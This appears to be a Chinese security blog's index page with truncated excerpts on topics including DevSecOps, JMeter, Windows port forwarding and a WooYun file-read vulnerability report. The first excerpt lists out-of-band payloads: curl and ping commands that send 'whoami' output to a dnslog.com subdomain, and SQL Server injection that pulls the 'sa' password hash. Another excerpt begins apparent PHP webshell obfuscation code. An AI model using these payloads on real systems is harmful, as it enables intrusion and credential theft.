蜗居

0x00 Command Execution i. *nix: curl http://ip.port.b182oj.dnslog.com/`whoami` ping `whoami`.ip.port.b182oj.dnslog.com ii. windows ping %USERNAME%.b182oj.dnslog.com 0x01 SQL Injection i. SQL Server DECLARE @host varchar(1024); SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa') +'....

参数化是自动化测试脚本的一种常用技巧。简单来说，参数化的一般用法就是将脚本中的某些输入使用参数来代替，在脚本运行时指定参数的取值范围和规则； 这样，脚本在运行时就可以根据需要选取不同的参数值作为输入。这种方式通常被称为数据驱动测试（Data Driven Test），参数的取值范围被称为数据池（Data Pool）。   jmeter的test plan中，支持如下4种参数化方式： 函...

0x00 前言 在Windows系统中，从XP开始就内嵌了一个设置网络端口转发的功能。依靠这个功能，任何到本地端口的TCP连接（ipv4或者ipv6）都能够被转发到任意一个本地端口，甚至是远程主机的某个端口。并且，Windows系统并不需要去开启监听这个转发端口的服务。 在Linux中，配置端口转发十分容易，使用iptables配置规则即可。但是在Windows服务器中，远程访问控制协议（RRAS）通...

这是一份甲方安全开源项目清单，收集了一些比较优秀的安全开源项目，以帮助甲方安全从业人员构建企业安全能力。 这些开源项目，每一个都在致力于解决一些安全问题。 项目收集的思路： 一个是关注互联网企业/团队的安全开源项目，经企业内部实践，这些最佳实践值得借鉴。另一个是来自企业安全能力建设的需求，根据需求分类，如WAF、HIDS、Git监控等。 这个收集是一个长期的过...

代码如下，Windows直接新建txt，粘贴进去保存，然后选择另存为，保存类型选所有文件、编码选ANSI、文件名为CmdAndPowershellAll.reg(名字无所谓，后缀为.reg就可以)。双击打开，会进行两次确认，然后会提示“已成功添加到注册表中”，这样就成功了！现在可以右键、shift+右键尝试一下了！   Windows Registry Editor Version 5.00 ; 1.右键：命令行 [HKEY_CLASSES_RO...

去哪儿任意文件读取（基本可重构该系统原工程） 编号 7329 Url http://www.wooyun.org/bug.php?action=view&id=7329 漏洞状态 厂商已经确认 漏洞标题 去哪儿任意文件读取（基本可重构该系统原工程） 漏洞类型 系统/服务运维配置不当 厂商 去哪儿 白帽子 shine 提交日期 2012-05-19 22:09:00 公开日期 2012-07-03 22:10:00 修复时间 (not set) 确...

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 11...

注意这里利用了 同一变量与另一变量和其异或值异或等于另一个数，如（a^b）^b=a。 首先是PHP的： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 <?php //code by Mr6 error_reporting(0); function randomkeys($length) { $pattern ...

改进和确保软件安全性的做法通常被称为（应用安全领域），或简称为“AppSec”。在传统的瀑布式系统开发生命周期（SDLC）中，AppSec通常是事后的想法，在发布之前雇用某人（一名渗透测试人员）来进行最后一分钟的安全测试，或者完全没有。 慢慢地，许多开发商店开始添加更多AppSec活动，例如安全代码审查，提供安全的编码指南或标准，为开发人员提供安全工具，以及介绍许多其...

DevSecOps海报（可访问下载https://www.devsecopsdays.com/resources/devsecopoly-board-poster-v01） DevSecOps作为安全领域中逐渐步入成熟期的技术体系，本质上承继了安全开发生命周期(SDL)安全关口左移的理念，DevSecOps总结起来就是：能力集成，持续学习，文化融合。其中“融合”这一理念也体现在了今年RSAC DevSecOps day的主题上-“DevOps Connect”，通过CI/CD（持续集成...